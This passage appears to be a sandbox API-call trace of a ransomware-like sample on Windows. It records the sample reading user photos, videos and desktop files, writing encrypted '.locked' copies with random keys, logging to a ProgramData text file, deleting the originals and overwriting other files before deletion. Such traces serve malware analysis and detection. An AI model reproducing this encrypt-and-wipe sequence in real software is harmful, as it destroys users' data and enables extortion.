lpCompletionPortEntries=0x336afb34, ulNumEntriesRemoved=0x336afb14) returned 0 [0316.035] SetEvent (hEvent=0x190) returned 1 [0316.035] SetEvent (hEvent=0x22c) returned 1 [0316.035] SetEvent (hEvent=0x1e8) returned 1 [0316.063] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\Xhgh4LkdSysSXjg.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\xhgh4lkdsyssxjg.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0316.066] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x125dae88 | out: lpMode=0x125dae88) returned 0 [0316.066] WriteFile (in: hFile=0x208, lpBuffer=0x14fe4000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125dae78, lpOverlapped=0x0 | out: lpBuffer=0x14fe4000*, lpNumberOfBytesWritten=0x125dae78*=0xfa000, lpOverlapped=0x0) returned 1 [0316.089] CloseHandle (hObject=0x208) returned 1 [0316.090] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\Xhgh4LkdSysSXjg.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\xhgh4lkdsyssxjg.png")) returned 1 [0316.121] SetEvent (hEvent=0x12c) returned 1 [0316.121] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0316.124] SetEvent (hEvent=0x14c) returned 1 [0316.124] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0316.198] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\tX9_ewqicQ_n-v\\pMFEi hP0gxXvAtY.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\tx9_ewqicq_n-v\\pmfei hp0gxxvaty.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0316.399] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x1249ce88 | out: lpMode=0x1249ce88) returned 0 [0316.399] WriteFile (in: hFile=0x218, lpBuffer=0x15ea8000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1249ce78, lpOverlapped=0x0 | out: lpBuffer=0x15ea8000*, lpNumberOfBytesWritten=0x1249ce78*=0xfa000, lpOverlapped=0x0) returned 1 [0316.428] CloseHandle (hObject=0x218) returned 1 [0316.429] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\eDM5D-EmY4\\EL7ncsIzIojJ _a9Ks\\tX9_ewqicQ_n-v\\pMFEi hP0gxXvAtY.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\edm5d-emy4\\el7ncsiziojj _a9ks\\tx9_ewqicq_n-v\\pmfei hp0gxxvaty.png")) returned 1 [0316.518] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x12659a24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x12659a24*=0xc) returned 1 [0316.529] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0316.556] SetEvent (hEvent=0x12c) returned 1 [0316.556] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0316.566] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0316.635] SetEvent (hEvent=0x220) returned 1 [0316.635] SetEvent (hEvent=0x1f0) returned 1 [0316.635] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0316.647] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0316.650] SetEvent (hEvent=0x14c) returned 1 [0316.650] SetEvent (hEvent=0x22c) returned 1 [0316.650] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0316.794] SetEvent (hEvent=0x134) returned 1 [0316.798] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Pictures\\wW1ws0e\\D5is0-m1xKE.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ww1ws0e\\d5is0-m1xke.png")) returned 1 [0316.908] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0316.979] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0316.983] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0316.986] SetEvent (hEvent=0x190) returned 1 [0316.986] SetEvent (hEvent=0x220) returned 1 [0316.986] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0317.046] SetEvent (hEvent=0x22c) returned 1 [0317.046] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0317.077] SetEvent (hEvent=0x190) returned 1 [0317.077] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0317.132] SetEvent (hEvent=0x1ac) returned 1 [0317.132] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0317.162] SetEvent (hEvent=0x14c) returned 1 [0317.162] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0317.184] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c2c0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e1a24, lpReserved=0x0 | out: lpBuffer=0x1234c2c0*, lpNumberOfCharsWritten=0x125e1a24*=0xc) returned 1 [0317.189] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0317.390] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0317.393] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0317.402] SetEvent (hEvent=0x1ac) returned 1 [0317.402] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0317.439] SetEvent (hEvent=0x1f0) returned 1 [0317.439] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0317.507] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0317.512] SetEvent (hEvent=0x1dc) returned 1 [0317.512] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x102 [0317.543] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0317.543] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x102 [0317.549] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0317.549] SetEvent (hEvent=0x1ac) returned 1 [0317.549] SetEvent (hEvent=0x1e8) returned 1 [0317.549] SetEvent (hEvent=0x190) returned 1 [0317.549] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0317.551] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb34, ulCount=0x10, ulNumEntriesRemoved=0x336afb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb34, ulNumEntriesRemoved=0x336afb14) returned 0 [0317.551] SetEvent (hEvent=0x150) returned 1 [0317.551] SetEvent (hEvent=0x1e8) returned 1 [0317.551] SetEvent (hEvent=0x190) returned 1 [0317.551] SetEvent (hEvent=0x1ac) returned 1 [0317.551] SetEvent (hEvent=0x134) returned 1 [0317.551] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0317.596] SetEvent (hEvent=0x220) returned 1 [0317.596] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0317.616] SetEvent (hEvent=0x190) returned 1 [0317.616] SetEvent (hEvent=0x22c) returned 1 [0317.616] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0317.720] SetEvent (hEvent=0x1e8) returned 1 [0317.720] SetEvent (hEvent=0x1f0) returned 1 [0317.720] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0317.724] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0317.829] SetEvent (hEvent=0x214) returned 1 [0317.829] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0317.835] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0317.870] SetEvent (hEvent=0x1ac) returned 1 [0317.870] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0317.889] SetEvent (hEvent=0x214) returned 1 [0317.890] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0317.921] SetEvent (hEvent=0x220) returned 1 [0317.921] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0317.962] SetEvent (hEvent=0x220) returned 1 [0317.962] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0317.987] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e020*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e3a24, lpReserved=0x0 | out: lpBuffer=0x1263e020*, lpNumberOfCharsWritten=0x125e3a24*=0xc) returned 1 [0317.991] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\BiBb.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\bibb.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0317.992] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x125e3d9c | out: lpMode=0x125e3d9c) returned 0 [0317.992] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\BiBb.avi.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\bibb.avi.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0318.222] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0318.301] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x125e3d9c | out: lpMode=0x125e3d9c) returned 0 [0318.301] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e000 | out: pbBuffer=0x1263e000) returned 1 [0318.301] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8080 | out: pbBuffer=0x124a8080) returned 1 [0318.301] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714001 | out: pbBuffer=0x12714001) returned 1 [0318.301] WriteFile (in: hFile=0x19c, lpBuffer=0x126c3000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e3d78, lpOverlapped=0x0 | out: lpBuffer=0x126c3000*, lpNumberOfBytesWritten=0x125e3d78*=0x80, lpOverlapped=0x0) returned 1 [0318.461] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb30, ulCount=0x10, ulNumEntriesRemoved=0x336afb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb30, ulNumEntriesRemoved=0x336afb10) returned 0 [0318.461] SetEvent (hEvent=0x1b8) returned 1 [0318.461] ReadFile (in: hFile=0x1f4, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e3d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x125e3d68*=0x1662a, lpOverlapped=0x0) returned 1 [0318.464] WriteFile (in: hFile=0x19c, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0x1662a, lpNumberOfBytesWritten=0x125e3d74, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x125e3d74*=0x1662a, lpOverlapped=0x0) returned 1 [0318.473] ReadFile (in: hFile=0x1f4, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e3d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x125e3d68*=0x0, lpOverlapped=0x0) returned 1 [0318.473] CloseHandle (hObject=0x19c) returned 1 [0318.508] CloseHandle (hObject=0x1f4) returned 1 [0318.508] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0318.533] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x125e3e94 | out: lpMode=0x125e3e94) returned 0 [0318.533] WriteFile (in: hFile=0x1f4, lpBuffer=0x1234a240*, nNumberOfBytesToWrite=0x38, lpNumberOfBytesWritten=0x125e3e64, lpOverlapped=0x0 | out: lpBuffer=0x1234a240*, lpNumberOfBytesWritten=0x125e3e64*=0x38, lpOverlapped=0x0) returned 1 [0318.543] CloseHandle (hObject=0x1f4) returned 1 [0318.577] SetEvent (hEvent=0x180) returned 1 [0318.577] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x102 [0318.593] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0318.593] SetEvent (hEvent=0x12c) returned 1 [0318.593] SetEvent (hEvent=0x180) returned 1 [0318.593] SetEvent (hEvent=0x22c) returned 1 [0318.593] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0318.601] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb34, ulCount=0x10, ulNumEntriesRemoved=0x336afb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb34, ulNumEntriesRemoved=0x336afb14) returned 0 [0318.601] SetEvent (hEvent=0x150) returned 1 [0318.601] SetEvent (hEvent=0x22c) returned 1 [0318.601] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\BiBb.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\bibb.avi")) returned 1 [0318.659] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0318.738] SetEvent (hEvent=0x1e8) returned 1 [0318.738] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0318.742] SetEvent (hEvent=0x180) returned 1 [0318.742] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0318.754] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0318.764] SetEvent (hEvent=0x104) returned 1 [0318.764] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x0 [0318.805] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0x1) returned 0x102 [0318.810] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0318.810] SetEvent (hEvent=0x198) returned 1 [0318.810] SetEvent (hEvent=0x22c) returned 1 [0318.810] SetEvent (hEvent=0x21c) returned 1 [0318.810] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0318.811] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x336afb34, ulCount=0x10, ulNumEntriesRemoved=0x336afb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x336afb34, ulNumEntriesRemoved=0x336afb14) returned 0 [0318.811] SetEvent (hEvent=0x22c) returned 1 [0318.811] SetEvent (hEvent=0x21c) returned 1 [0318.811] SetEvent (hEvent=0x198) returned 1 [0318.811] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c200 | out: pbBuffer=0x1234c200) returned 1 [0318.811] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392020 | out: pbBuffer=0x12392020) returned 1 [0318.811] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340281 | out: pbBuffer=0x12340281) returned 1 [0318.811] WriteFile (in: hFile=0x1bc, lpBuffer=0x12701000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12631d78, lpOverlapped=0x0 | out: lpBuffer=0x12701000*, lpNumberOfBytesWritten=0x12631d78*=0x80, lpOverlapped=0x0) returned 1 [0318.816] ReadFile (in: hFile=0x234, lpBuffer=0x156c8000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12631d68, lpOverlapped=0x0 | out: lpBuffer=0x156c8000*, lpNumberOfBytesRead=0x12631d68*=0x2e0b, lpOverlapped=0x0) returned 1 [0318.817] WriteFile (in: hFile=0x1bc, lpBuffer=0x156c8000*, nNumberOfBytesToWrite=0x2e0b, lpNumberOfBytesWritten=0x12631d74, lpOverlapped=0x0 | out: lpBuffer=0x156c8000*, lpNumberOfBytesWritten=0x12631d74*=0x2e0b, lpOverlapped=0x0) returned 1 [0318.871] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0318.961] ReadFile (in: hFile=0x234, lpBuffer=0x156c8000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12631d68, lpOverlapped=0x0 | out: lpBuffer=0x156c8000*, lpNumberOfBytesRead=0x12631d68*=0x0, lpOverlapped=0x0) returned 1 [0318.962] CloseHandle (hObject=0x1bc) returned 1 [0318.997] CloseHandle (hObject=0x234) returned 1 [0318.997] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x234 [0318.997] GetConsoleMode (in: hConsoleHandle=0x234, lpMode=0x12631e94 | out: lpMode=0x12631e94) returned 0 [0318.998] WriteFile (in: hFile=0x234, lpBuffer=0x125ec320*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12631e64, lpOverlapped=0x0 | out: lpBuffer=0x125ec320*, lpNumberOfBytesWritten=0x12631e64*=0x41, lpOverlapped=0x0) returned 1 [0318.998] CloseHandle (hObject=0x234) returned 1 [0318.998] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\MCHoHyAA18 aW.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\mchohyaa18 aw.avi")) returned 1 [0320.210] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0320.364] SetEvent (hEvent=0x134) returned 1 [0320.364] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0320.841] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0320.842] WriteFile (in: hFile=0x1f8, lpBuffer=0x1735c000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276fe78, lpOverlapped=0x0 | out: lpBuffer=0x1735c000*, lpNumberOfBytesWritten=0x1276fe78*=0xfa000, lpOverlapped=0x0) returned 1 [0320.861] CloseHandle (hObject=0x1f8) returned 1 [0320.861] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\a55N4D.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\a55n4d.mp4")) returned 1 [0320.894] SetEvent (hEvent=0x1ac) returned 1 [0320.894] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) returned 0x0 [0320.941] SetEvent (hEvent=0x214) returned 1 [0320.941] SetEvent (hEvent=0x190) returned 1 [0320.941] WaitForSingleObject (hHandle=0x20c, dwMilliseconds=0xffffffff) Thread: id = 439 os_tid = 0xdd4 [0260.651] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x337eff58, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x337eff58*=0x1b4) returned 1 [0260.651] SetEvent (hEvent=0x1ac) returned 1 [0260.651] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1b8 [0260.651] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0260.682] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc040*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1239da24, lpReserved=0x0 | out: lpBuffer=0x125fc040*, lpNumberOfCharsWritten=0x1239da24*=0xb) returned 1 [0260.703] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0260.709] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\PG2AA8VgUaJQix3.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\pg2aa8vguajqix3.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0260.709] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x1239dd9c | out: lpMode=0x1239dd9c) returned 0 [0260.710] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\PG2AA8VgUaJQix3.bmp.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\pg2aa8vguajqix3.bmp.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0261.363] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x1239dd9c | out: lpMode=0x1239dd9c) returned 0 [0261.363] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390240 | out: pbBuffer=0x12390240) returned 1 [0261.363] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12392120 | out: pbBuffer=0x12392120) returned 1 [0261.364] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c181 | out: pbBuffer=0x1237c181) returned 1 [0261.364] WriteFile (in: hFile=0x224, lpBuffer=0x12653000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1239dd78, lpOverlapped=0x0 | out: lpBuffer=0x12653000*, lpNumberOfBytesWritten=0x1239dd78*=0x80, lpOverlapped=0x0) returned 1 [0261.365] VirtualAlloc (lpAddress=0x15950000, dwSize=0x9d0000, flAllocationType=0x1000, flProtect=0x4) returned 0x15950000 [0261.396] VirtualAlloc (lpAddress=0x10d0e000, dwSize=0x9c000, flAllocationType=0x1000, flProtect=0x4) returned 0x10d0e000 [0261.398] VirtualAlloc (lpAddress=0x216c000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x216c000 [0261.532] ReadFile (in: hFile=0x1e0, lpBuffer=0x1532a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239dd68, lpOverlapped=0x0 | out: lpBuffer=0x1532a000*, lpNumberOfBytesRead=0x1239dd68*=0xe7d8, lpOverlapped=0x0) returned 1 [0261.536] WriteFile (in: hFile=0x224, lpBuffer=0x1532a000*, nNumberOfBytesToWrite=0xe7d8, lpNumberOfBytesWritten=0x1239dd74, lpOverlapped=0x0 | out: lpBuffer=0x1532a000*, lpNumberOfBytesWritten=0x1239dd74*=0xe7d8, lpOverlapped=0x0) returned 1 [0261.747] ReadFile (in: hFile=0x1e0, lpBuffer=0x1532a000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1239dd68, lpOverlapped=0x0 | out: lpBuffer=0x1532a000*, lpNumberOfBytesRead=0x1239dd68*=0x0, lpOverlapped=0x0) returned 1 [0261.747] CloseHandle (hObject=0x224) returned 1 [0261.817] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0261.988] CloseHandle (hObject=0x1e0) returned 1 [0261.988] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0261.989] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x1239de94 | out: lpMode=0x1239de94) returned 0 [0261.989] WriteFile (in: hFile=0x1e0, lpBuffer=0x123801c0*, nNumberOfBytesToWrite=0x37, lpNumberOfBytesWritten=0x1239de64, lpOverlapped=0x0 | out: lpBuffer=0x123801c0*, lpNumberOfBytesWritten=0x1239de64*=0x37, lpOverlapped=0x0) returned 1 [0261.989] CloseHandle (hObject=0x1e0) returned 1 [0261.991] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\PG2AA8VgUaJQix3.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\pg2aa8vguajqix3.bmp")) returned 1 [0261.995] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x3000, flProtect=0x4) returned 0x340b0000 [0262.082] SetEvent (hEvent=0x12c) returned 1 [0262.082] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0263.082] SetEvent (hEvent=0x220) returned 1 [0263.082] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0263.114] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\dda kMB.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\dda kmb.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0264.327] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x124a3e88 | out: lpMode=0x124a3e88) returned 0 [0264.327] WriteFile (in: hFile=0x208, lpBuffer=0x146de000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x124a3e78, lpOverlapped=0x0 | out: lpBuffer=0x146de000*, lpNumberOfBytesWritten=0x124a3e78*=0xfa000, lpOverlapped=0x0) returned 1 [0265.431] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0265.866] CloseHandle (hObject=0x208) returned 1 [0265.977] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0266.075] SetEvent (hEvent=0x104) returned 1 [0266.075] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0266.346] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0269.425] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\9fTBKDfklFX1UCW.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\9ftbkdfklfx1ucw.avi")) returned 1 [0269.699] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0270.096] SetEvent (hEvent=0x190) returned 1 [0270.096] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0270.116] SetEvent (hEvent=0x12c) returned 1 [0270.116] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0270.154] SetEvent (hEvent=0x134) returned 1 [0270.154] SetEvent (hEvent=0x1d0) returned 1 [0270.154] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0273.487] SetEvent (hEvent=0x214) returned 1 [0273.487] WaitForSingleObject (hHandle=0x1b8, dwMilliseconds=0xffffffff) returned 0x0 [0273.521] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x337efb30, ulCount=0x10, ulNumEntriesRemoved=0x337efb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x337efb30, ulNumEntriesRemoved=0x337efb10) returned 0 [0273.530] SetEvent (hEvent=0x190) returned 1 [0273.530] SetEvent (hEvent=0x184) returned 1 [0273.531] WaitForSingleObject 